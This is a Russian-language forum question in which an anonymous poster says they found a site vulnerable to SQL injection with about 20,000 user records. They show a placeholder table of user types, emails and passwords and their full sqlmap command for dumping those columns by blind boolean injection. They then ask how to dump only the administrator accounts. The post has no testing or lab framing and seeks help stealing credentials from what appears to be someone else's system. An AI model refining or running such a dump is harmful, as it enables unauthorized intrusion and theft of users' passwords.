Как сбросить определенные данные на SqlMap?Python

Программы на Python
Anonymous
Как сбросить определенные данные на SqlMap?

Сообщение Anonymous »

Я нашел цель, которая уязвима с помощью sqlmap, и имеется 20 тыс. данных

Код: Выделить всё

+-------------+----------------+--------------+
|  usertype   |      email     |   password   |
+-------------+----------------+--------------+
|  User       | example@ex.com |   12345678   |
|  Admin      | example@ex.com |   12345678   |
|  Admin      | example@ex.com |   12345678   |
|  User       | example@ex.com |   12345678   |
|  ...        |                |              |
+-------------+----------------+--------------+
я использую слепое логическое тип инъекции - предложение WHERE или HAVING, теперь как я могу сбросить данные, что только тип пользователя - администратор?

моя команда:

Код: Выделить всё

python sqlmap.py -u https://example.com --data "inject=0&data=1*" --cookie="user_session=example" -D user_data -T table_user -C usertype,email,password --dump --level 2 --risk 2
при использовании команды sql следует использовать оператор WHERE, но он не работает с использованием --os-shell

Вернуться в «Python»